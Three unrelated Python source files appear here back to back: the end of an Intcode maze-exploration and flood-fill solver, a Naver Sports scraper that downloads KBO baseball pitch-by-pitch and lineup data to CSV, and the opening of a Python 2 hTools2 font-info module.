pos = deepcopy(position)
if i == 0:
pos[1] += 1
elif i == 1:
pos[1] -= 1
elif i == 2:
pos[0] -= 1
else:
pos[0] += 1
if tuple(pos) in layout:
continue
new_comp = deepcopy(comp)
new_comp.input(i+1)
new_comp.run()
out = new_comp.output()[0]
layout[tuple(pos)] = out
if out == 0:
continue
else:
queue.append((new_comp, pos, step_count))
if out == 2:
print(step_count)
return pos
return None
def fill(position, step_count):
step_count += 1
n = (position[0], position[1] + 1)
s = (position[0], position[1] - 1)
w = (position[0] + 1, position[1])
e = (position[0] - 1, position[1])
nn = 0
sn = 0
wn = 0
en = 0
if n in layout and layout[n] != 0 and n not in flood:
flood[n] = step_count
nn = 1 + fill(n, step_count)
if s in layout and layout[s] != 0 and s not in flood:
flood[s] = step_count
sn = 1 + fill(s, step_count)
if w in layout and layout[w] != 0 and w not in flood:
flood[w] = step_count
wn = 1 + fill(w, step_count)
if e in layout and layout[e] != 0 and e not in flood:
flood[e] = step_count
en = 1 + fill(e, step_count)
return max(nn, sn, wn, en)
c = Computer(sys.argv[1])
layout = {(0, 0): 1}
queue = [(c, [0, 0], 0)]
oxygen_pos = []
while len(queue):
item = queue.pop(0)
r = move(item[0], item[1], item[2])
if r != None:
oxygen_pos = r
flood = {tuple(oxygen_pos): 0}
print(fill(tuple(oxygen_pos), 0))
|
import pandas as pd
import sys, time, requests, json, datetime, pathlib, warnings
import numpy as np
from dateutil.relativedelta import relativedelta
from tqdm import tqdm, trange
from bs4 import BeautifulSoup
from game_parse import game_status
regular_start = {
'3333': '0101', # playoff
'4444': '0101', # playoff
'5555': '0101', # playoff
'7777': '0101', # playoff
'2008': '0329',
'2009': '0404',
'2010': '0327',
'2011': '0402',
'2012': '0407',
'2013': '0330',
'2014': '0329',
'2015': '0328',
'2016': '0401',
'2017': '0331',
'2018': '0324',
'2019': '0323',
'2020': '0505',
'2021': '0403',
}
playoff_start = {
'3333': '1231', # playoff
'4444': '1231', # playoff
'5555': '1231', # playoff
'7777': '1231', # playoff
'2008': '1008',
'2009': '0920',
'2010': '1005',
'2011': '1008',
'2012': '1008',
'2013': '1008',
'2014': '1019',
'2015': '1010',
'2016': '1021',
'2017': '1010',
'2018': '1015',
'2019': '1003',
'2020': '1101',
'2021': '1101',
}
def get_game_ids(start_date, end_date, playoff=False):
"""
KBO 경기 ID를 가져온다.
Parameters
-----------
start_date, end_date : datetime.date
ID를 가져올 경기 기간의 시작일과 종료일.
start_date <= Game Date of Games <= end_date
playoff : bool, default False
True일 경우 플레이오프(포스트시즌) 경기 ID도 받는다.
"""
timetable_url = 'https://sports.news.naver.com/'\
'kbaseball/schedule/index.nhn?month='
mon1 = start_date.replace(day=1)
r = []
while mon1 <= end_date:
r.append(mon1)
mon1 += relativedelta(months=1)
game_ids = []
for d in r:
month = d.month
year = d.year
year_regular_start = regular_start[str(year)]
year_playoff_start = playoff_start[str(year)]
year_regular_start_date = datetime.date(year,
int(year_regular_start[:2]),
int(year_regular_start[2:]))
year_playoff_start_date = datetime.date(year,
int(year_playoff_start[:2]),
int(year_playoff_start[2:]))
year_last_date = datetime.date(year, 12, 31)
sch_url = timetable_url + f'{month}&year={year}'
response = requests.get(sch_url)
soup = BeautifulSoup(response.text, 'lxml')
response.close()
sch_tbs = soup.findAll('div', attrs={'class': 'sch_tb'})
sch_tb2s = soup.findAll('div', attrs={'class': 'sch_tb2'})
sch_tbs += sch_tb2s
for row in sch_tbs:
day_table = row.findAll('tr')
for game in day_table:
add_state = game.findAll('td', attrs={'class': 'add_state'})
tds = game.findAll('td')
if len(tds) < 4:
continue
links = game.findAll('span',
attrs={'class': 'td_btn'})
date_td = game.findAll('span', attrs={'class': 'td_date'})
if len(date_td) > 0:
date_text = date_td[0].text
if len(add_state) > 0:
status = add_state[0].findAll('span')[-1].get('class')[0]
if status == 'suspended':
continue
for btn in links:
gid = btn.a['href'].split('/')[2]
try:
gid_date = datetime.date(int(gid[:4]),
int(gid[4:6]),
int(gid[6:8]))
except:
continue
if start_date <= gid_date <= end_date:
if playoff == False:
if year_regular_start_date <= gid_date < year_playoff_start_date:
game_ids.append(gid)
else:
if year_regular_start_date <= gid_date < year_last_date:
game_ids.append(gid)
return game_ids
def get_game_data(game_id):
"""
KBO 경기 PBP 데이터를 가져온다.
Parameters
-----------
game_id : str
가져올 게임 ID.
"""
relay_url = 'http://m.sports.naver.com/ajax/baseball/'\
'gamecenter/kbo/relayText.nhn'
record_url = 'http://m.sports.naver.com/ajax/baseball/'\
'gamecenter/kbo/record.nhn'
params = {'gameId': game_id, 'half': '1'}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
'AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/59.0.3071.115 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
'Host': 'm.sports.naver.com',
'Referer': 'http://m.sports.naver.com/baseball'\
'/gamecenter/kbo/index.nhn?&gameId='
+ game_id
+ '&tab=relay'
}
with warnings.catch_warnings():
warnings.simplefilter('ignore')
#####################################
# 1. pitch by pitch 데이터 가져오기 #
#####################################
relay_response = requests.get(relay_url,
params=params,
headers=headers)
if relay_response.status_code > 200:
relay_response.close()
return [None, None, 'response error\n']
relay_json = relay_response.json()
js = None
try:
js = json.loads(relay_json)
relay_response.close()
except JSONDecodeError:
relay_response.close()
return [None, None, 'got no valid data\n']
if js.get('gameId') is None:
return [None, None, 'invalid game ID\n']
last_inning = js['currentInning']
if last_inning is None:
return [None, None, 'no last inning\n']
game_data_set = {}
game_data_set['relayList'] = []
for x in js['relayList']:
game_data_set['relayList'].append(x)
# 라인업에 대한 기초 정보가 담겨 있음
game_data_set['homeTeamLineUp'] = js['homeTeamLineUp']
game_data_set['awayTeamLineUp'] = js['awayTeamLineUp']
game_data_set['stadium'] = js['schedule']['stadium']
for inn in range(2, last_inning + 1):
params = {
'gameId': game_id,
'half': str(inn)
}
relay_inn_response = requests.get(relay_url, params=params, headers=headers)
if relay_inn_response.status_code > 200:
relay_inn_response.close()
return [None, None, 'response error\n']
relay_json = relay_inn_response.json()
try:
js = json.loads(relay_json)
relay_response.close()
except JSONDecodeError:
relay_inn_response.close()
return [None, None, 'got no valid data\n']
for x in js['relayList']:
game_data_set['relayList'].append(x)
#########################
# 2. 가져온 정보 다듬기 #
#########################
relay_list = game_data_set['relayList']
text_keys = ['seqno', 'text', 'type', 'stuff',
'ptsPitchId', 'speed', 'playerChange']
pitch_keys = ['crossPlateX', 'topSz',
'pitchId', 'vy0', 'vz0', 'vx0',
'z0', 'ax', 'x0', 'ay', 'az',
'bottomSz']
# pitch by pitch 텍스트 데이터 취합
text_set = []
stadium = game_data_set['stadium']
for k in range(len(relay_list)):
for j in range(len(relay_list[k].get('textOptionList'))):
text_row = relay_list[k].get('textOptionList')[j]
text_row_dict = {}
text_row_dict['textOrder'] = relay_list[k].get('no')
for key in text_keys:
if key == 'playerChange':
if text_row.get(key) is not None:
for x in ['outPlayer', 'inPlayer', 'shiftPlayer']:
if x in text_row.get(key).keys():
text_row_dict[x] = text_row.get(key).get(x).get('playerId')
else:
text_row_dict[key] = None if key not in text_row.keys() else text_row.get(key)
# text_row_dict['referee'] = referee
text_row_dict['stadium'] = stadium
text_set.append(text_row_dict)
text_set_df = pd.DataFrame(text_set)
text_set_df = text_set_df.rename(index=str, columns={'ptsPitchId': 'pitchId'})
text_set_df.seqno = pd.to_numeric(text_set_df.seqno)
# pitch by pitch 트래킹 데이터 취합
pitch_data_set = []
pitch_data_df = None
for k in range(len(relay_list)):
if relay_list[k].get('ptsOptionList') is not None:
for j in range(len(relay_list[k].get('ptsOptionList'))):
pitch_data = relay_list[k].get('ptsOptionList')[j]
pitch_data_dict = {}
pitch_data_dict['textOrder'] = relay_list[k].get('no')
for key in pitch_keys:
pitch_data_dict[key] = None if key not in pitch_data.keys() else pitch_data.get(key)
pitch_data_set.append(pitch_data_dict)
# 텍스트(중계) 데이터, 트래킹 데이터 취합
if len(pitch_data_set) > 0:
pitch_data_df = pd.DataFrame(pitch_data_set)
relay_df = pd.merge(text_set_df, pitch_data_df, how='outer').sort_values(['textOrder', 'seqno'])
else:
relay_df = text_set_df.sort_values(['textOrder', 'seqno'])
##################################################
# 3. 선발 라인업, 포지션, 레퍼리 데이터 가져오기 #
##################################################
lineup_url = 'https://sports.news.naver.com/gameCenter'\
'/gameRecord.nhn?category=kbo&gameId='
lineup_response = requests.get(lineup_url + game_id)
if lineup_response.status_code > 200:
lineup_response.close()
return [None, None, 'response error\n']
lineup_soup = BeautifulSoup(lineup_response.text, 'lxml')
lineup_response.close()
scripts = lineup_soup.find_all('script')
if scripts[10].contents[0].find('잘못된') > 0:
return [None, None, 'false script page\n']
team_names = lineup_soup.find_all('span', attrs={'class': 't_name_txt'})
away_team_name = team_names[0].contents[0].split(' ')[0]
home_team_name = team_names[1].contents[0].split(' ')[0]
for tag in scripts:
if len(tag.contents) > 0:
if tag.contents[0].find('DataClass = ') > 0:
contents = tag.contents[0]
start = contents.find('DataClass = ') + 36
end = contents.find('_homeTeam')
oldjs = contents[start:end].strip()
while oldjs[-1] != '}':
oldjs = oldjs[:-1]
while oldjs[0] != '{':
oldjs = oldjs[1:]
try:
cont = json.loads(oldjs)
except JSONDecodeError:
return [None, None, f'JSONDecodeError - gameID {game_id}\n']
break
# 구심 정보 가져와서 취합
referee = cont.get('etcRecords')[-1]['result'].split(' ')[0]
relay_df = relay_df.assign(referee = referee)
# 경기 끝나고 나오는 박스스코어, 홈/어웨이 라인업
boxscore = cont.get('battersBoxscore')
away_lineup = boxscore.get('away')
home_lineup = boxscore.get('home')
pos_dict = {'중': '중견수', '좌': '좌익수', '우': '우익수',
'유': '유격수', '포': '포수', '지': '지명타자',
'一': '1루수', '二': '2루수', '三': '3루수'}
home_players = []
away_players = []
for i in range(len(home_lineup)):
player = home_lineup[i]
name = player.get('name')
pos = player.get('pos')[0]
pCode = player.get('playerCode')
home_players.append({'name': name, 'pos': pos, 'pCode': pCode})
for i in range(len(away_lineup)):
player = away_lineup[i]
name = player.get('name')
pos = player.get('pos')[0]
pCode = player.get('playerCode')
away_players.append({'name': name, 'pos': pos, 'pCode': pCode})
##############################
# 4. 기존 라인업 정보와 취합 #
##############################
hit_columns = ['name', 'pCode', 'posName',
'hitType', 'seqno', 'batOrder']
pit_columns = ['name', 'pCode', 'hitType', 'seqno']
atl = game_data_set.get('awayTeamLineUp')
abat = atl.get('batter')
apit = atl.get('pitcher')
abats = pd.DataFrame(abat, columns=hit_columns).sort_values(['batOrder', 'seqno'])
apits = pd.DataFrame(apit, columns=pit_columns).sort_values('seqno')
htl = game_data_set.get('homeTeamLineUp')
hbat = htl.get('batter')
hpit = htl.get('pitcher')
hbats = pd.DataFrame(hbat, columns=hit_columns).sort_values(['batOrder', 'seqno'])
hpits = pd.DataFrame(hpit, columns=pit_columns).sort_values('seqno')
#####################################
# 5. 라인업 정보 보강 #
#####################################
record_response = requests.get(record_url,
params=params,
headers=headers)
if record_response.status_code > 200:
record_response.close()
return [None, None, 'response error\n']
record_json = record_response.json()
record_response.close()
apr = pd.DataFrame(record_json['awayPitcher'])
hpr = pd.DataFrame(record_json['homePitcher'])
abr = pd.DataFrame(record_json['awayBatter'])
hbr = pd.DataFrame(record_json['homeBatter'])
apr = apr.rename(index=str, columns={'pcode':'pCode'})
hpr = hpr.rename(index=str, columns={'pcode':'pCode'})
abr = abr.rename(index=str, columns={'pcode':'pCode'})
hbr = hbr.rename(index=str, columns={'pcode':'pCode'})
apr.loc[:, 'seqno'] = 10
apr.loc[:, 'hitType'] = None
hpr.loc[:, 'seqno'] = 10
hpr.loc[:, 'hitType'] = None
abr.loc[:, 'seqno'] = 10
abr.loc[:, 'hitType'] = None
abr.loc[:, 'posName'] = None
hbr.loc[:, 'seqno'] = 10
hbr.loc[:, 'hitType'] = None
hbr.loc[:, 'posName'] = None
for p in apr.pCode.unique():
if p in apits.pCode.unique():
apr.loc[(apr.pCode == p), 'seqno'] = int(apits.loc[apits.pCode == p].seqno.values[0])
apr.loc[(apr.pCode == p), 'hitType'] = apits.loc[apits.pCode == p].hitType.values[0]
else:
apr.loc[(apr.pCode == p), 'seqno'] = 10
for p in hpr.pCode.unique():
if p in hpits.pCode.unique():
hpr.loc[(hpr.pCode == p), 'seqno'] = int(hpits.loc[hpits.pCode == p].seqno.values[0])
hpr.loc[(hpr.pCode == p), 'hitType'] = hpits.loc[hpits.pCode == p].hitType.values[0]
else:
hpr.loc[(hpr.pCode == p), 'seqno'] = 10
for p in abats.pCode.unique():
if p in abats.pCode.unique():
abr.loc[(abr.pCode == p), 'seqno'] = int(abats.loc[abats.pCode == p].seqno.values[0])
abr.loc[(abr.pCode == p), 'posName'] = abats.loc[abats.pCode == p].posName.values[0]
abr.loc[(abr.pCode == p), 'hitType'] = abats.loc[abats.pCode == p].hitType.values[0]
else:
abr.loc[(abr.pCode == p), 'seqno'] = 10
for p in hbats.pCode.unique():
if p in hbats.pCode.unique():
hbr.loc[(hbr.pCode == p), 'seqno'] = int(hbats.loc[hbats.pCode == p].seqno.values[0])
hbr.loc[(hbr.pCode == p), 'posName'] = hbats.loc[hbats.pCode == p].posName.values[0]
hbr.loc[(hbr.pCode == p), 'hitType'] = hbats.loc[hbats.pCode == p].hitType.values[0]
else:
hbr.loc[(hbr.pCode == p), 'seqno'] = 10
apr = apr.astype({'seqno': int})
hpr = hpr.astype({'seqno': int})
abr = abr.astype({'seqno': int})
hbr = hbr.astype({'seqno': int})
apits = apr[pit_columns]
hpits = hpr[pit_columns]
abats = abr[hit_columns]
hbats = hbr[hit_columns]
# 선발 출장한 경우, 선수의 포지션을 경기 시작할 때 포지션으로 수정
# (pitch by pitch 데이터에서 가져온 정보는 경기 종료 시의 포지션임)
for player in away_players:
# '교'로 적혀있는 교체 선수는 넘어간다
if player.get('pos') == '교':
continue
abats.loc[(abats.name == player.get('name')) &
(abats.pCode == player.get('pCode')), 'posName'] = pos_dict.get(player.get('pos'))
if len(player.get('name')) > 3:
pname = player.get('name')
for i in range(len(abats)):
if abats.iloc[i].values[0].find(pname) > -1:
pCode = abats.iloc[i].pCode
abats.loc[(abats.pCode == pCode), 'posName'] = pos_dict.get(player.get('pos'))
break
for player in home_players:
# '교'로 적혀있는 교체 선수는 넘어간다
if player.get('pos') == '교':
continue
hbats.loc[(hbats.name == player.get('name')) &
(hbats.pCode == player.get('pCode')), 'posName'] = pos_dict.get(player.get('pos'))
if len(player.get('name')) > 3:
pname = player.get('name')
for i in range(len(hbats)):
if hbats.iloc[i].values[0].find(pname) > -1:
pCode = hbats.iloc[i].pCode
hbats.loc[(hbats.pCode == pCode), 'posName'] = pos_dict.get(player.get('pos'))
break
abats = abats.assign(homeaway = 'a', team_name = away_team_name)
hbats = hbats.assign(homeaway = 'h', team_name = home_team_name)
apits = apits.assign(homeaway = 'a', team_name = away_team_name)
hpits = hpits.assign(homeaway = 'h', team_name = home_team_name)
batting_df = pd.concat([abats, hbats])
pitching_df = pd.concat([apits, hpits])
batting_df.pCode = pd.to_numeric(batting_df.pCode)
pitching_df.pCode = pd.to_numeric(pitching_df.pCode)
return pitching_df, batting_df, relay_df
def get_game_data_renewed(game_id):
nav_api_header = 'https://api-gw.sports.naver.com/schedule/games/'
with warnings.catch_warnings():
warnings.simplefilter('ignore')
#####################################
# 0. 게임 메타 데이터 가져오기 #
#####################################
game_req = requests.get(nav_api_header + game_id)
if game_req.status_code > 200:
game_req.close()
return [None, None, 'meta data request error\n']
game_req_result = game_req.json()
if game_req_result.get('code') > 200:
game_req.close()
return [None, None, 'meta data request error\n']
game_req.close()
game_meta_data = game_req_result.get('result').get('game')
stadium = game_meta_data.get('stadium')
homeTeamCode = game_meta_data.get('homeTeamCode')
homeTeamName = game_meta_data.get('homeTeamName')
awayTeamCode = game_meta_data.get('awayTeamCode')
awayTeamName = game_meta_data.get('awayTeamName')
if game_meta_data.get('currentInning') is not None:
max_inning = int(game_meta_data.get('currentInning').split('회')[0])
else:
max_inning = int(game_meta_data.get('statusInfo').split('회')[0])
box_score_req = requests.get(f'{nav_api_header}{game_id}/record')
if box_score_req.status_code > 200:
box_score_req.close()
return [None, None, 'meta data(box score) request error\n']
box_score_req_result = box_score_req.json()
if box_score_req_result.get('code') > 200:
box_score_req.close()
return [None, None, 'meta data(box score) request error\n']
box_score_req.close()
box_score_data = box_score_req_result.get('result').get('recordData')
if len(box_score_data.get('etcRecords')) > 0:
referees = box_score_data.get('etcRecords')[-1].get('result').split(' ')
else:
print(game_id)
referees = ['']
away_batting_order = box_score_data.get('battersBoxscore').get('away')
home_batting_order = box_score_data.get('battersBoxscore').get('home')
away_pitchers = box_score_data.get('pitchersBoxscore').get('away')
home_pitchers = box_score_data.get('pitchersBoxscore').get('home')
#####################################
# 1. pitch by pitch 데이터 가져오기 #
#####################################
game_data_set = {}
game_data_set['pitchTextList'] = []
game_data_set['pitchTrackDataList'] = []
text_keys = ['seqno', 'text', 'type', 'stuff',
'ptsPitchId', 'speed', 'playerChange']
pitch_keys = ['crossPlateX', 'topSz',
'pitchId', 'vy0', 'vz0', 'vx0',
'z0', 'ax', 'x0', 'ay', 'az',
'bottomSz']
for inning in range(1, max_inning+1):
pbp_req = requests.get(f'{nav_api_header}{game_id}/relay?inning={inning}')
if pbp_req.status_code > 200:
pbp_req.close()
print([None, None, 'pbp relay data request error\n'])
assert False
pbp_req_result = pbp_req.json()
if pbp_req_result.get('code') > 200:
pbp_req.close()
print([None, None, 'pbp relay data request error\n'])
assert False
pbp_req.close()
pbp_data = pbp_req_result.get('result').get('textRelayData')
for textSetList in pbp_data.get('textRelays')[::-1]:
textRow = {}
pitchTrackerRow = {}
textSet = textSetList.get('textOptions')
textSetNo = textSetList.get('no')
for pitchTextData in textSet:
textRow = {}
textRow['textOrder'] = textSetNo
for key in text_keys:
if key == 'playerChange':
if pitchTextData.get(key) is not None:
for x in ['outPlayer', 'inPlayer', 'shiftPlayer']:
if x in pitchTextData.get(key).keys():
textRow[x] = pitchTextData.get(key).get(x).get('playerId')
else:
if key not in pitchTextData.keys():
textRow[key] = None
else:
textRow[key] = pitchTextData.get(key)
textRow['referee'] = referees[0]
textRow['stadium'] = stadium
game_data_set['pitchTextList'].append(textRow)
pitchTrackerSet = textSetList.get('ptsOptions')
for pitchTrackData in pitchTrackerSet:
pitchTrackerRow = {}
pitchTrackerRow['textOrder'] = textSetNo
for key in pitch_keys:
if key not in pitchTrackData.keys():
pitchTrackerRow[key] = None
else:
pitchTrackerRow[key] = pitchTrackData.get(key)
game_data_set['pitchTrackDataList'].append(pitchTrackData)
text_set_df = pd.DataFrame(game_data_set['pitchTextList'])
text_set_df = text_set_df.rename(index=str, columns={'ptsPitchId': 'pitchId'})
text_set_df.seqno = pd.to_numeric(text_set_df.seqno)
# 텍스트(중계) 데이터, 트래킹 데이터 취합
if len(game_data_set['pitchTrackDataList']) > 0:
pitch_data_df = pd.DataFrame(game_data_set['pitchTrackDataList'])
relay_df = pd.merge(text_set_df, pitch_data_df, how='outer').sort_values(['textOrder', 'seqno'])
else:
relay_df = text_set_df.sort_values(['textOrder', 'seqno'])
########################################
# 2. 라인업 정리 #
########################################
# 라인업에 대한 기초 정보가 담겨 있음
# 경기 끝나고나서 최종 정보 -> 포지션은 마지막 상황
game_data_set['awayLineup'] = pbp_data.get('awayLineup')
game_data_set['homeLineup'] = pbp_data.get('homeLineup')
game_data_set['stadium'] = stadium
pos_dict = {'중': '중견수', '좌': '좌익수', '우': '우익수',
'유': '유격수', '포': '포수', '지': '지명타자',
'一': '1루수', '二': '2루수', '三': '3루수'}
home_players = []
away_players = []
for i in range(len(home_batting_order)):
player = home_batting_order[i]
name = player.get('name')
pos = player.get('pos')[0]
pcode = player.get('playerCode')
home_players.append({'name': name, 'pos': pos, 'pcode': pcode})
for i in range(len(away_batting_order)):
player = away_batting_order[i]
name = player.get('name')
pos = player.get('pos')[0]
pcode = player.get('playerCode')
away_players.append({'name': name, 'pos': pos, 'pcode': pcode})
############################################
# 3. 메타 데이터에 있는 라인업 정보와 취합 #
############################################
# 메타 데이터에는 경기 시작했을 때 포지션 정보가 있음
hit_columns = ['name', 'pcode', 'posName',
'hitType', 'seqno', 'batOrder']
pit_columns = ['name', 'pcode', 'hitType', 'seqno']
away_lineup_meta_data = game_data_set.get('awayLineup')
away_batters = away_lineup_meta_data.get('batter')
away_pitchers = away_lineup_meta_data.get('pitcher')
away_lineup_df = pd.DataFrame(away_batters, columns=hit_columns).sort_values(['batOrder', 'seqno'])
away_pitcher_df = pd.DataFrame(away_pitchers, columns=pit_columns).sort_values('seqno')
home_lineup_meta_data = game_data_set.get('homeLineup')
home_batters = home_lineup_meta_data.get('batter')
home_pitchers = home_lineup_meta_data.get('pitcher')
home_lineup_df = pd.DataFrame(home_batters, columns=hit_columns).sort_values(['batOrder', 'seqno'])
home_pitcher_df = pd.DataFrame(home_pitchers, columns=pit_columns).sort_values('seqno')
away_lineup_df = away_lineup_df.assign(pcode = pd.to_numeric(away_lineup_df.pcode))
away_pitcher_df = away_pitcher_df.assign(pcode = pd.to_numeric(away_pitcher_df.pcode))
home_lineup_df = home_lineup_df.assign(pcode = pd.to_numeric(home_lineup_df.pcode))
home_pitcher_df = home_pitcher_df.assign(pcode = pd.to_numeric(home_pitcher_df.pcode))
ap = pd.DataFrame(away_players)
ap = ap.assign(pcode = pd.to_numeric(ap.pcode))
hp = pd.DataFrame(home_players)
hp = hp.assign(pcode = pd.to_numeric(hp.pcode))
away_lineup_df = pd.merge(away_lineup_df, ap, on='pcode', how='outer')
home_lineup_df = pd.merge(home_lineup_df, hp, on='pcode', how='outer')
# 선발 출장한 경우, 선수의 포지션을 경기 시작할 때 포지션으로 수정
# (pitch by pitch 데이터에서 가져온 정보는 경기 종료 시의 포지션임)
away_lineup_df = away_lineup_df.assign(name = np.where(away_lineup_df.name_x.isnull(),
away_lineup_df.name_y,
away_lineup_df.name_x))
home_lineup_df = home_lineup_df.assign(name = np.where(home_lineup_df.name_x.isnull(),
home_lineup_df.name_y,
home_lineup_df.name_x))
lineup_df_columns = ['name', 'pcode', 'posName', 'hitType', 'seqno', 'batOrder', 'pos']
away_lineup_df = away_lineup_df[lineup_df_columns]
home_lineup_df = home_lineup_df[lineup_df_columns]
away_lineup_df = away_lineup_df\
.assign(posName = np.where(away_lineup_df.pos != '교',
away_lineup_df.pos\
.apply(lambda x: pos_dict.get(x)),
away_lineup_df.posName))
home_lineup_df = home_lineup_df\
.assign(posName = np.where(home_lineup_df.pos != '교',
home_lineup_df.pos\
.apply(lambda x: pos_dict.get(x)),
home_lineup_df.posName))
away_lineup_df = away_lineup_df.assign(homeaway = 'a', team_name = awayTeamName)
home_lineup_df = home_lineup_df.assign(homeaway = 'h', team_name = homeTeamName)
away_pitcher_df = away_pitcher_df.assign(homeaway = 'a', team_name = awayTeamName)
home_pitcher_df = home_pitcher_df.assign(homeaway = 'h', team_name = homeTeamName)
batting_df = pd.concat([away_lineup_df, home_lineup_df])
pitching_df = pd.concat([away_pitcher_df, home_pitcher_df])
batting_df.pcode = pd.to_numeric(batting_df.pcode)
pitching_df.pcode = pd.to_numeric(pitching_df.pcode)
return pitching_df, batting_df, relay_df
def download_pbp_files(start_date, end_date, playoff=False,
save_path=None, debug_mode=False,
save_source=False):
"""
KBO 피치 바이 피치(PBP) 파일을 다운로드.
Parameters
-----------
start_date, end_date : datetime.date
PBP 파일을 받을 경기 기간의 시작일과 종료일.
start_date <= Game Date of Downloaded Files <= end_date
playoff : bool, default False
True일 경우 플레이오프(포스트시즌) 경기 파일도 받는다.
save_path : pathlib.Path, default None
PBP 파일을 저장할 경로.
값이 없을 경우(None) 현재 경로에 저장.
debug_mode : bool, default False
True일 경우 sys.stdout을 통해 디버그 메시지와 수행 시간이 출력됨.
save_source : bool, default False
True일 경우 parsing 이전의 소스 데이터를 csv 형식으로 저장.
"""
start_time = time.time()
game_ids = get_game_ids(start_date, end_date, playoff)
end_time = time.time()
get_game_id_time = end_time - start_time
enc = 'cp949' if sys.platform == 'win32' else 'utf-8'
now = datetime.datetime.now()
logfile = open('./log.txt', 'a', encoding=enc)
logfile.write('\n\n')
logfile.write('====================================\n')
logfile.write(f"Current Time : {now.isoformat()}\n")
logfile.write('====================================\n')
skipped = 0
broken = 0
done = 0
start_time = time.time()
get_data_time = 0
gid = None
years = list(set([x[:4] for x in game_ids]))
try:
for y in years:
y_path = save_path / y
if not y_path.is_dir():
try:
y_path.mkdir()
except FileExistsError:
logfile.write(f'ERROR : path {y_path} exists, but not a directory')
logfile.write(f'\tclean path and try again')
print(f'ERROR : path {y_path} exists, but not a directory')
print(f'\tclean path and try again')
exit(1)
for gid in tqdm(game_ids):
now = datetime.datetime.now().date()
gid_to_date = datetime.date(int(gid[:4]),
int(gid[4:6]),
int(gid[6:8]))
if gid_to_date > now:
continue
if (save_path / gid[:4] / f'{gid}.csv').exists():
skipped += 1
continue
ptime = time.time()
source_path = save_path / gid[:4] / 'source'
if (source_path / f'{gid}_pitching.csv').exists() &\
(source_path / f'{gid}_batting.csv').exists() &\
(source_path / f'{gid}_relay.csv').exists():
game_data_dfs = []
game_data_dfs.append(pd.read_csv(str(source_path / f'{gid}_pitching.csv'), encoding=enc))
game_data_dfs.append(pd.read_csv(str(source_path / f'{gid}_batting.csv'), encoding=enc))
game_data_dfs.append(pd.read_csv(str(source_path / f'{gid}_relay.csv'), encoding=enc))
else:
game_data_dfs = get_game_data_renewed(gid)
if game_data_dfs[0] is None:
logfile.write(game_data_dfs[-1])
if debug_mode == True:
print(game_data_dfs[-1])
exit(1)
if save_source == True:
if not source_path.is_dir():
try:
source_path.mkdir()
except FileExistsError:
source_path = save_path / gid[:4]
logfile.write(f'NOTE: {gid[:4]}/source exists but not a directory.')
logfile.write(f'source files will be saved in {gid[:4]} instead.')
if not (source_path / f'{gid}_pitching.csv').exists():
game_data_dfs[0].to_csv(str(source_path / f'{gid}_pitching.csv'),
index=False, encoding=enc, errors='replace')
if not (source_path / f'{gid}_batting.csv').exists():
game_data_dfs[1].to_csv(str(source_path / f'{gid}_batting.csv'),
index=False, encoding=enc, errors='replace')
if not (source_path / f'{gid}_relay.csv').exists():
game_data_dfs[2].to_csv(str(source_path / f'{gid}_relay.csv'),
index=False, encoding=enc, errors='replace')
get_data_time += time.time() - ptime
if game_data_dfs is not None:
gs = game_status()
gs.load(gid, game_data_dfs[0], game_data_dfs[1], game_data_dfs[2], log_file=logfile)
parse = gs.parse_game(debug_mode)
gs.save_game(save_path / gid[:4])
if parse == True:
done += 1
else:
broken += 1
else:
broken += 1
continue
end_time = time.time()
parse_time = end_time - start_time - get_data_time
logfile.write('====================================\n')
logfile.write(f'Start date : {start_date.strftime("%Y%m%d")}\n')
logfile.write(f'End date : {end_date.strftime("%Y%m%d")}\n')
logfile.write(f'Successfully downloaded games : {done}\n')
logfile.write(f'Skipped games(already exists) : {skipped}\n')
logfile.write(f'Broken games(bad data) : {broken}\n')
logfile.write('====================================\n')
if debug_mode == True:
logfile.write(f'Elapsed {get_game_id_time:.2f} sec in get_game_ids\n')
logfile.write(f'Elapsed {(get_data_time):.2f} sec in get_game_data\n')
logfile.write(f'Elapsed {(parse_time):.2f} sec in parse_game\n')
logfile.write(f'Total {(parse_time+get_game_id_time+get_data_time):.2f} sec elapsed with {len(game_ids)} games\n')
if logfile.closed is not True:
logfile.close()
except:
logfile.write(f'=== gameID : {gid}\n')
if logfile.closed is not True:
logfile.close()
assert False
|
# [h] hTools2.modules.fontinfo
"""Tools to get and set different kinds of font information.
See the `UFO documentation <http://unifiedfontobject.org/versions/ufo2/fontinfo.html>`_.
"""
# debug
import hTools2
reload(hTools2)
if hTools2.DEBUG:
import fileutils
reload(fileutils)
# imports
import os
from fileutils import get_names_from_path
# set info
def set_font_names(font, family_name, style_name):
"""Set several font naming fields from ``family`` and ``style`` names."""
full_name = '%s_%s' % (family_name, style_name)
# main family/style names
font.info.familyName = family_name
font.info.styleName = style_name
# style map names
font.info.styleMapFamilyName = None # full_name
font.info.styleMapStyleName = None # 'regular'
# opentype names
font.info.openTypeNamePreferredFamilyName = None # family_name
font.info.openTypeNamePreferredSubfamilyName = None # style_name
font.info.openTypeNameCompatibleFullName = None # full_name
font.info.openTypeNameUniqueID = None
# postscript names
font.info.postscriptFontName = None # full_name
font.info.postscriptFullName = None # full_name
font.info.postscriptUniqueID = None
font.info.postscriptWeightName = None
# FOND names
font.info.macintoshFONDFamilyID = None
font.info.macintoshFONDName = None
def set_names_from_path(font, prefix=None):
"""Set the font naming fields using parts of the name of the font file."""
family_name, style_name = get_names_from_path(font.path)
if prefix:
family_name = prefix + ' ' + family_name
set_font_names(font, family_name, style_name)
def set_vmetrics(font, xheight, capheight, ascender, descender, emsquare, gridsize=1):
font.info.xHeight = xheight * gridsize
font.info.capHeight = capheight * gridsize
font.info.descender = descender * gridsize
font.info.ascender = ascender * gridsize
font.info.unitsPerEm = emsquare * gridsize
# print info
def print_font_info(font, options=None):
"""Print several kinds of font information, using a special method for each section.
The data and related functions are organized according to the UFO 2 spec.
"""
print 'printing font info...'
print_generic_identification(font)
print_generic_legal(font)
print_generic_dimension(font)
print_generic_miscellaneous(font)
print_opentype_head(font)
print_opentype_hhea(font)
print_opentype_name(font)
print_opentype_os2(font)
print_opentype_vhea(font)
print_postscript_data(font)
def print_generic_identification(font):
print '-' * 60
print 'Generic Identification Information'
print '-' * 60
print 'familyName:', font.info.familyName
print 'styleName:', font.info.styleName
print 'styleMapFamilyName:', font.info.styleMapFamilyName
print 'styleMapStyleName:', font.info.styleMapStyleName
print 'versionMajor:', font.info.versionMajor
print 'versionMinor:', font.info.versionMinor
